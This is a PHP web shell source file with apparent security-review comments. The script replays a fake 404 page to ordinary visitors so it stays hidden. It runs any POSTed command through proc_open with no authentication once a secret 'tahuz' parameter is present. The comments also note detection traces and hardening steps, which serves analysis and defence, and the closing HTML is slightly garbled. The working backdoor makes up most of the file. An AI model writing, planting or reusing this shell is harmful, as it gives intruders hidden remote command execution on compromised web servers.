// Open a PHP session; later in this file the session stores the working directory
// between requests ($_SESSION['cwd']).
session_start();
// Build the origin of the site this script is hosted on (HTTP/HTTPS + host).
// NOTE(review): HTTP_HOST is filled from the request's Host header, so this origin is
// client-influenced rather than a fixed server-side value.
$scheme = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? "https://" : "http://";
$host = $_SERVER['HTTP_HOST'];
$self_404 = $scheme . $host . "/s.php"; // decoy path the author expects not to exist (should answer 404)
// Decoy branch: when the query parameter `tahuz` is absent, fetch the decoy URL from
// this same site and replay its response (headers, status, body) to the visitor, then
// stop. Only the presence of the parameter is tested here; its value is not checked.
// NOTE(review, detection): each request without the parameter makes the server issue a
// second request for /s.php carrying the visitor's User-Agent. That self-request, and
// any request whose query string contains `tahuz`, are the access-log traces this
// branch leaves.
if (!isset($_GET['tahuz'])) {
$ch = curl_init($self_404);
curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_HEADER => true,
CURLOPT_NOBODY => false,
// Forward the visitor's User-Agent, falling back to a generic browser string.
CURLOPT_USERAGENT => $_SERVER['HTTP_USER_AGENT'] ?? 'Mozilla/5.0'
]);
$resp = curl_exec($ch);
// CURLOPT_HEADER puts the response headers in front of the body in $resp; the header
// size reported by curl is used to split the two again.
$headerSize = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
$status = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
$header = substr($resp, 0, $headerSize);
$body = substr($resp, $headerSize);
// Replay the fetched header lines, skipping Content-Length and Transfer-Encoding so the
// framing of this response is left to the local server.
foreach (explode("\r\n", $header) as $line) {
if (stripos($line, 'Content-Length') === 0 || stripos($line, 'Transfer-Encoding') === 0) continue;
header($line);
}
// Re-send the status code curl reported for the fetched page.
header("HTTP/1.1 $status");
echo $body;
exit;
}
// === SHELL MODE ===
// Reached only when the `tahuz` query parameter is present. No password, token or other
// authentication is visible in this file: the parameter's presence is the whole gate.
// The working directory is kept in the session so it persists across requests.
if (!isset($_SESSION['cwd'])) {
$_SESSION['cwd'] = getcwd();
}
// A POST field `cd` naming an existing directory replaces the stored working directory.
// The value is resolved with realpath() but is not restricted to any base directory.
if (isset($_POST['cd']) && is_dir($_POST['cd'])) {
$_SESSION['cwd'] = realpath($_POST['cd']);
}
chdir($_SESSION['cwd']);
$cwd = getcwd();
// Run the submitted command.
// The POST field `cmd` is handed to proc_open() unmodified: the visible code applies no
// allow-list, escaping or caller check. This is the remote command execution primitive
// of the script.
// NOTE(review, hardening/detection): hosts that do not need process spawning from PHP can
// list proc_open in php.ini `disable_functions`. At runtime, the signal to alert on is
// the web server's PHP worker starting child processes.
$output = '';
if (isset($_POST['cmd'])) {
// stdin, stdout and stderr are all opened as pipes.
$desc = [0 => ['pipe', 'r'], 1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
$p = proc_open($_POST['cmd'], $desc, $pipes);
if (is_resource($p)) {
// Only stdout is collected; the stderr pipe is opened above but never read here.
$output = stream_get_contents($pipes[1]);
proc_close($p);
} else {
$output = "proc_open error";
}
}
<!DOCTYPE html>
Shell<meta charset="UTF-8"><title>Shell</title>
<body style="background:#000;color:#0f0;font-family:monospace;padding:20px;">
Shell Aktif | Dir: = htmlspecialchars($cwd)
<pre>= htmlspecialchars($output) </pre>